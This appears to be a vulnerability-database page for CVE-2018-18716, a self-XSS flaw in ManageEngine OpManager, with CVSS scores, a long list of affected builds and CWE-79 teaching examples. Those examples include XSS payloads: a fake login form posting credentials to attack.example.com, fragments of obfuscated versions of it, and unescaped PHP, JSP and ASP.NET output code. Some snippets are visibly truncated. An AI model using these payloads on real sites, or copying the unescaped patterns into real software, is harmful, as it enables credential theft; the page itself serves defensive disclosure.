CVE-2018-18716 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Severity

43%

Complexity

86%

Confidentiality

48%

Zoho ManageEngine OpManager 12.3 before 123219 has a Self XSS Vulnerability.

Zoho ManageEngine OpManager 12.3 before 123219 has a Self XSS Vulnerability.

CVSS 3.0 Base Score 6.1. CVSS Attack Vector: network. CVSS Attack Complexity: low. CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).

CVSS 2.0 Base Score 4.3. CVSS Attack Vector: network. CVSS Attack Complexity: medium. CVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N).

Demo Examples

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CWE-79

This code displays a welcome message on a web page based on the HTTP GET username parameter. This example covers a Reflected XSS (Type 1) scenario.


               
echo '<div class="header"> Welcome, ' . $username . '</div>';

Because the parameter can be arbitrary, the url of the page could be modified so $username contains scripting syntax, such as


               
http://trustedSite.example.com/welcome.php?username=<Script Language="Javascript">alert("You've been attacked!");</Script>

This results in a harmless alert dialogue popping up. Initially this might not appear to be much of a vulnerability. After all, why would someone enter a URL that causes malicious code to run on their own computer? The real danger is that an attacker will create the malicious URL, then use e-mail or social engineering tricks to lure victims into visiting a link to the URL. When victims click the link, they unwittingly reflect the malicious content through the vulnerable web application back to their own computers.

More realistically, the attacker can embed a fake login box on the page, tricking the user into sending the user's password to the attacker:


               
http://trustedSite.example.com/welcome.php?username=<div id="stealPassword">Please Login:<form name="input" action="http://attack.example.com/stealPassword.php" method="post">Username: <input type="text" name="username" /><br/>Password: <input type="password" name="password" /><br/><input type="submit" value="Login" /></form></div>

If a user clicks on this link then Welcome.php will generate the following HTML and send it to the user's browser:


               
</div></div>
</form>
<input type="submit" value="Login" />

The trustworthy domain of the URL may falsely assure the user that it is OK to follow the link. However, an astute user may notice the suspicious text appended to the URL. An attacker may further obfuscate the URL (the following example links are broken into multiple lines for readability):


               
+%2F%3E%3C%2Fform%3E%3C%2Fdiv%3E%0D%0A

The same attack string could also be obfuscated as:


               
\u003E\u003C\u002F\u0066\u006F\u0072\u006D\u003E\u003C\u002F\u0064\u0069\u0076\u003E\u000D');</script>

Both of these attack links will result in the fake login box appearing on the page, and users are more likely to ignore indecipherable text at the end of URLs.

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CWE-79

This example also displays a Reflected XSS (Type 1) scenario.

The following JSP code segment reads an employee ID, eid, from an HTTP request and displays it to the user.


               
Employee ID: <%= eid %>

The following ASP.NET code segment reads an employee ID number from an HTTP request and displays it to the user.


               
<p><asp:label id="EmployeeID" runat="server" /></p>

The code in this example operates correctly if the Employee ID variable contains only standard alphanumeric text. If it has a value that includes meta-characters or source code, then the code will be executed by the web browser as it displays the HTTP response.

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CWE-79

This example covers a Stored XSS (Type 2) scenario.

The following JSP code segment queries a database for an employee with a given ID and prints the corresponding employee's name.


               
Employee Name: <%= name %>
String name = rs.getString("name");

The following ASP.NET code segment queries a database for an employee with a given employee ID and prints the name corresponding with the ID.


               
<p><asp:label id="EmployeeName" runat="server" /></p>

This code can appear less dangerous because the value of name is read from a database, whose contents are apparently managed by the application. However, if the value of name originates from user-supplied data, then the database can be a conduit for malicious content. Without proper input validation on all data stored in the database, an attacker can execute malicious commands in the user's web browser.

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CWE-79

The following example consists of two separate pages in a web application, one devoted to creating user accounts and another devoted to listing active users currently logged in. It also displays a Stored XSS (Type 2) scenario.

CreateUser.php


               
/.../

The code is careful to avoid a SQL injection attack (CWE-89) but does not stop valid HTML from being stored in the database. This can be exploited later when ListUsers.php retrieves the information:

ListUsers.php


               
echo '</div>';
exit;
//Print list of users to page
echo '<div class="userNames">'.$row['fullname'].'</div>';

The attacker can set their name to be arbitrary HTML, which will then be displayed to all visitors of the Active Users page. This HTML can, for example, be a password stealing Login message.

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CWE-79

Consider an application that provides a simplistic message board that saves messages in HTML format and appends them to a file. When a new user arrives in the room, it makes an announcement:


               
saveMessage($announceStr);//save HTML-formatted message to file; implementation details are irrelevant for this example.

An attacker may be able to perform an HTML injection (Type 2 XSS) attack by setting a cookie to a value like:


               
<script>document.alert('Hacked');</script>

The raw contents of the message file would look like:


               
<script>document.alert('Hacked');</script> has logged in.

For each person who visits the message page, their browser would execute the script, generating a pop-up window that says "Hacked". More malicious attacks are possible; see the rest of this entry.

Overview

Type

ZohoCorp

First reported 6 years ago

2018-11-20 19:29:00

Last updated 6 years ago

2018-12-10 19:35:00

Affected Software

ZohoCorp Manageengine OpManager 11.4

11.4

ZohoCorp Manageengine OpManager 11.5

11.5

ZohoCorp ManageEngine OpManager 12.3

12.3

ZohoCorp ManageEngine OpManager 12.3 12300

12.3

ZohoCorp ManageEngine OpManager 12.3 123001

12.3

ZohoCorp ManageEngine OpManager 12.3 123002

12.3

ZohoCorp ManageEngine OpManager 12.3 123003

12.3

ZohoCorp ManageEngine OpManager 12.3 123004

12.3

ZohoCorp ManageEngine OpManager 12.3 123005

12.3

ZohoCorp ManageEngine OpManager 12.3 123006

12.3

ZohoCorp ManageEngine OpManager 12.3 123007

12.3

ZohoCorp ManageEngine OpManager 12.3 123008

12.3

ZohoCorp ManageEngine OpManager 12.3 123009

12.3

ZohoCorp ManageEngine OpManager 12.3 123010

12.3

ZohoCorp ManageEngine OpManager 12.3 123011

12.3

ZohoCorp ManageEngine OpManager 12.3 123012

12.3

ZohoCorp ManageEngine OpManager 12.3 123013

12.3

ZohoCorp ManageEngine OpManager 12.3 123014

12.3

ZohoCorp ManageEngine OpManager 12.3 123015

12.3

ZohoCorp ManageEngine OpManager 12.3 123021

12.3

ZohoCorp ManageEngine OpManager 12.3 123022

12.3

ZohoCorp ManageEngine OpManager 12.3 123023

12.3

ZohoCorp ManageEngine OpManager 12.3 123024

12.3

ZohoCorp ManageEngine OpManager 12.3 123025

12.3

ZohoCorp ManageEngine OpManager 12.3 123026

12.3

ZohoCorp ManageEngine OpManager 12.3 123027

12.3

ZohoCorp ManageEngine OpManager 12.3 123028

12.3

ZohoCorp ManageEngine OpManager 12.3 123029

12.3

ZohoCorp ManageEngine OpManager 12.3 123030

12.3

ZohoCorp ManageEngine OpManager 12.3 123031

12.3

ZohoCorp ManageEngine OpManager 12.3 123032

12.3

ZohoCorp ManageEngine OpManager 12.3 123033

12.3

ZohoCorp ManageEngine OpManager 12.3 123034

12.3

ZohoCorp ManageEngine OpManager 12.3 123035

12.3

ZohoCorp ManageEngine OpManager 12.3 123036

12.3

ZohoCorp ManageEngine OpManager 12.3 123037

12.3

ZohoCorp ManageEngine OpManager 12.3 123043

12.3

ZohoCorp ManageEngine OpManager 12.3 123044

12.3

ZohoCorp ManageEngine OpManager 12.3 123045

12.3

ZohoCorp ManageEngine OpManager 12.3 123046

12.3

ZohoCorp ManageEngine OpManager 12.3 123047

12.3

ZohoCorp ManageEngine OpManager 12.3 123048

12.3

ZohoCorp ManageEngine OpManager 12.3 123049

12.3

ZohoCorp ManageEngine OpManager 12.3 123050

12.3

ZohoCorp ManageEngine OpManager 12.3 123051

12.3

ZohoCorp ManageEngine OpManager 12.3 123052

12.3

ZohoCorp ManageEngine OpManager 12.3 123053

12.3

ZohoCorp ManageEngine OpManager 12.3 123054

12.3

ZohoCorp ManageEngine OpManager 12.3 123055

12.3

ZohoCorp ManageEngine OpManager 12.3 123056

12.3

ZohoCorp ManageEngine OpManager 12.3 123057

12.3

ZohoCorp ManageEngine OpManager 12.3 123062

12.3

ZohoCorp ManageEngine OpManager 12.3 123063

12.3

ZohoCorp ManageEngine OpManager 12.3 123064

12.3

ZohoCorp ManageEngine OpManager 12.3 123065

12.3

ZohoCorp ManageEngine OpManager 12.3 123066

12.3

ZohoCorp ManageEngine OpManager 12.3 123067

12.3

ZohoCorp ManageEngine OpManager 12.3 123068

12.3

ZohoCorp ManageEngine OpManager 12.3 123069

12.3

ZohoCorp ManageEngine OpManager 12.3 123070

12.3

ZohoCorp ManageEngine OpManager 12.3 123076

12.3

ZohoCorp ManageEngine OpManager 12.3 123077

12.3

ZohoCorp ManageEngine OpManager 12.3 123078

12.3

ZohoCorp ManageEngine OpManager 12.3 123079

12.3

ZohoCorp ManageEngine OpManager 12.3 123080

12.3

ZohoCorp ManageEngine OpManager 12.3 123081

12.3

ZohoCorp ManageEngine OpManager 12.3 123082

12.3

ZohoCorp ManageEngine OpManager 12.3 123083

12.3

ZohoCorp ManageEngine OpManager 12.3 123084

12.3

ZohoCorp ManageEngine OpManager 12.3 123086

12.3

ZohoCorp ManageEngine OpManager 12.3 123090

12.3

ZohoCorp ManageEngine OpManager 12.3 123091

12.3

ZohoCorp ManageEngine OpManager 12.3 123092

12.3

ZohoCorp ManageEngine OpManager 12.3 123093

12.3

ZohoCorp ManageEngine OpManager 12.3 123104

12.3

ZohoCorp ManageEngine OpManager 12.3 123105

12.3

ZohoCorp ManageEngine OpManager 12.3 123106

12.3

ZohoCorp ManageEngine OpManager 12.3 123107

12.3

ZohoCorp ManageEngine OpManager 12.3 123108

12.3

ZohoCorp ManageEngine OpManager 12.3 123109

12.3

ZohoCorp ManageEngine OpManager 12.3 123110

12.3

ZohoCorp ManageEngine OpManager 12.3 123111

12.3

ZohoCorp ManageEngine OpManager 12.3 123112

12.3

ZohoCorp ManageEngine OpManager 12.3 123113

12.3

ZohoCorp ManageEngine OpManager 12.3 123114

12.3

ZohoCorp ManageEngine OpManager 12.3 123115

12.3

ZohoCorp ManageEngine OpManager 12.3 123116

12.3

ZohoCorp ManageEngine OpManager 12.3 123117

12.3

ZohoCorp ManageEngine OpManager 12.3 123118

12.3

ZohoCorp ManageEngine OpManager 12.3 123119

12.3

ZohoCorp ManageEngine OpManager 12.3 123120

12.3

ZohoCorp ManageEngine OpManager 12.3 123121

12.3

ZohoCorp ManageEngine OpManager 12.3 123122

12.3

ZohoCorp ManageEngine OpManager 12.3 123123

12.3

ZohoCorp ManageEngine OpManager 12.3 123124

12.3

ZohoCorp ManageEngine OpManager 12.3 123125

12.3

ZohoCorp ManageEngine OpManager 12.3 123126

12.3

ZohoCorp ManageEngine OpManager 12.3 123127

12.3

ZohoCorp ManageEngine OpManager 12.3 123136

12.3

ZohoCorp ManageEngine OpManager 12.3 123137

12.3

ZohoCorp ManageEngine OpManager 12.3 123147

12.3

ZohoCorp ManageEngine OpManager 12.3 123148

12.3

ZohoCorp ManageEngine OpManager 12.3 123149

12.3

ZohoCorp ManageEngine OpManager 12.3 123150

12.3

ZohoCorp ManageEngine OpManager 12.3 123156

12.3

ZohoCorp ManageEngine OpManager 12.3 123157

12.3

ZohoCorp ManageEngine OpManager 12.3 123158

12.3

ZohoCorp ManageEngine OpManager 12.3 123159

12.3

ZohoCorp ManageEngine OpManager 12.3 123160

12.3

ZohoCorp ManageEngine OpManager 12.3 123161

12.3

ZohoCorp ManageEngine OpManager 12.3 123162

12.3

ZohoCorp ManageEngine OpManager 12.3 123163

12.3

ZohoCorp ManageEngine OpManager 12.3 123164

12.3

ZohoCorp ManageEngine OpManager 12.3 123165

12.3

ZohoCorp ManageEngine OpManager 12.3 123166

12.3

ZohoCorp ManageEngine OpManager 12.3 123167

12.3

ZohoCorp ManageEngine OpManager 12.3 123168

12.3

ZohoCorp ManageEngine OpManager 12.3 123169

12.3

ZohoCorp ManageEngine OpManager 12.3 123175

12.3

ZohoCorp ManageEngine OpManager 12.3 123176

12.3

ZohoCorp ManageEngine OpManager 12.3 123177

12.3

ZohoCorp ManageEngine OpManager 12.3 123178

12.3

ZohoCorp ManageEngine OpManager 12.3 123179

12.3

ZohoCorp ManageEngine OpManager 12.3 123180

12.3

ZohoCorp ManageEngine OpManager 12.3 123181

12.3

ZohoCorp ManageEngine OpManager 12.3 123182

12.3

ZohoCorp ManageEngine OpManager 12.3 123183

12.3

ZohoCorp ManageEngine OpManager 12.3 123184

12.3

ZohoCorp ManageEngine OpManager 12.3 123185

12.3

ZohoCorp ManageEngine OpManager 12.3 123186

12.3

ZohoCorp ManageEngine OpManager 12.3 123187

12.3

ZohoCorp ManageEngine OpManager 12.3 123188

12.3

ZohoCorp ManageEngine OpManager 12.3 123189

12.3

ZohoCorp ManageEngine OpManager 12.3 123190

12.3

ZohoCorp ManageEngine OpManager 12.3 123191

12.3

ZohoCorp ManageEngine OpManager 12.3 123192

12.3

ZohoCorp ManageEngine OpManager 12.3 123193

12.3

ZohoCorp ManageEngine OpManager 12.3 123194

12.3

ZohoCorp ManageEngine OpManager 12.3 123195

12.3

ZohoCorp ManageEngine OpManager 12.3 123196

12.3

ZohoCorp ManageEngine OpManager 12.3 123197

12.3

ZohoCorp ManageEngine OpManager 12.3 123198

12.3

ZohoCorp ManageEngine OpManager 12.3 123204

12.3

ZohoCorp ManageEngine OpManager 12.3 123205

12.3

ZohoCorp ManageEngine OpManager 12.3 123206

12.3

ZohoCorp ManageEngine OpManager 12.3 123207

12.3

ZohoCorp ManageEngine OpManager 12.3 123208

12.3

ZohoCorp ManageEngine OpManager 12.3 123214

12.3

ZohoCorp ManageEngine OpManager 12.3 123215

12.3

ZohoCorp ManageEngine OpManager 12.3 123217

12.3

ZohoCorp ManageEngine OpManager 12.3 123218

12.3

Stay updated

ExploitPedia is constantly evolving. Sign up to receive a notification when we release additional functionality.

Get in touch

If you'd like to report a bug or have any suggestions for improvements then please do get in touch with us using this form. We will get back to you as soon as we can.